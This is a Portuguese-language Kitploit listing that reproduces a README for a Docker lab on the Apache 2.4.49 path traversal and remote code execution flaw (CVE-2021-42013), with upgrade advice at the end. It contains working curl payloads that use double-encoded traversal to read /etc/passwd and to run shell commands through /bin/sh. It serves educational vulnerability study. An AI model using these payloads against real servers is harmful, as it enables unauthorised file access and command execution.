Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
apache-cve-2021-42013-lab — Laboratório demonstrando a vulnerabilidade do Apache HTTP Server 2.4.49 (CVE-2021-42013) em ambiente Docker. | Kitploit
Ferramentas/GitHubGitHub/berraesen/apache-cve-2021-42013-lab
Segurança de ContêineresAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebAprendizado e EducaçãoLabs e Prática
GitHubberraesen/apache-cve-2021-42013-lab

apache-cve-2021-42013-lab

Laboratório demonstrando a vulnerabilidade do Apache HTTP Server 2.4.49 (CVE-2021-42013) em ambiente Docker.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
há 1 mêsAinda não revisado

Apache HTTP Server 2.4.49 Path Traversal & Execução Remota de Código (CVE-2021-42013)

Sobre o Projeto

Neste projeto, demonstrei a vulnerabilidade CVE-2021-42013 encontrada na versão 2.4.49 do Apache HTTP Server em um ambiente de laboratório que criei usando Docker.

O objetivo é examinar, em um ambiente controlado, como a vulnerabilidade ocorre, como funciona e quais são seus efeitos no sistema.

Este trabalho foi preparado apenas para fins educacionais e de laboratório.

Tecnologias Utilizadas

  • Docker
  • Ubuntu 22.04
  • Apache HTTP Server 2.4.49
  • Bash
  • curl

Estrutura de Arquivos do Projeto

root@kitploit:~
.
├── Dockerfile
├── index.html
└── README.md

Requisitos

Antes de executar o projeto, os seguintes itens devem estar instalados.

  • Docker Desktop
  • Git (opcional)

Instalação

Primeiro, baixe o repositório para o seu computador.

root@kitploit:~
git clone https://github.com/berraesen/apache-cve-2021-42013-lab.git

Entre na pasta.

root@kitploit:~
cd apache-cve-2021-42013-lab

Crie a imagem Docker.

root@kitploit:~
docker build -t apache-2.4.49-src .

Inicie o contêiner.

root@kitploit:~
docker run -d -p 8081:80 --name apache-src apache-2.4.49-src

Entre no contêiner.

root@kitploit:~
docker exec -it apache-src /bin/bash

Verifique a versão do Apache.

root@kitploit:~
/usr/local/apache2/bin/httpd -v

Para sair do contêiner:

root@kitploit:~
exit

Verificando os Módulos do Apache

Você pode verificar se o módulo CGI está habilitado com o seguinte comando.

root@kitploit:~
docker exec -it apache-src /usr/local/apache2/bin/apachectl -M

Habilitando o Módulo CGI

root@kitploit:~
docker exec -it apache-src sed -i 's/#LoadModule cgid_module/LoadModule cgid_module/g' /usr/local/apache2/conf/httpd.conf

Em seguida, reinicie o Apache.

root@kitploit:~
docker exec -it apache-src /usr/local/apache2/bin/apachectl restart

Para desabilitar o módulo CGI:

root@kitploit:~
docker exec -it apache-src sed -i 's/LoadModule cgid_module/#LoadModule cgid_module/g' /usr/local/apache2/conf/httpd.conf

Em seguida, reinicie novamente.

Testando a Vulnerabilidade

Path Traversal

root@kitploit:~
curl.exe -v --path-as-is "http://localhost:8081/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd"

Execução Remota de Código

root@kitploit:~
curl.exe -v --path-as-is "http://localhost:8081/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh" --data "echo; id"

Para exibir mais informações do sistema:

root@kitploit:~
curl.exe -s --path-as-is "http://localhost:8081/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh" --data "echo; id; uname -a; whoami" -o -

Resultado Esperado

Após a conclusão da instalação:

  • O Apache 2.4.49 deve estar funcionando corretamente.
  • Quando o módulo CGI está habilitado, a vulnerabilidade pode ser observada.
  • O acesso a arquivos do sistema pode ser demonstrado via Path Traversal.
  • Com RCE, é possível ver que comandos podem ser executados no servidor.

Lógica de Funcionamento da Vulnerabilidade

root@kitploit:~
İstemci (cURL)
      │
      ▼
Apache HTTP Server 2.4.49
      │
      ▼
URL Normalization Hatası
      │
      ▼
Path Traversal
      │
      ├──────────────► CGI Kapalı
      │                     │
      │                     ▼
      │             Dosya erişimi mümkün olabilir
      │
      ▼
CGI Aktif
      │
      ▼
/bin/sh çalıştırılabilir
      │
      ▼
Remote Code Execution (RCE)

Para que o cenário de RCE possa ser demonstrado, o módulo mod_cgi precisa estar habilitado.

Prevenção

Para corrigir esta vulnerabilidade, recomenda-se atualizar o Apache HTTP Server para a versão 2.4.51 ou mais recente. Além disso, se o CGI não for utilizado, recomenda-se desabilitá-lo e definir permissões de acesso apropriadas apenas para os diretórios necessários.

Baixar ferramenta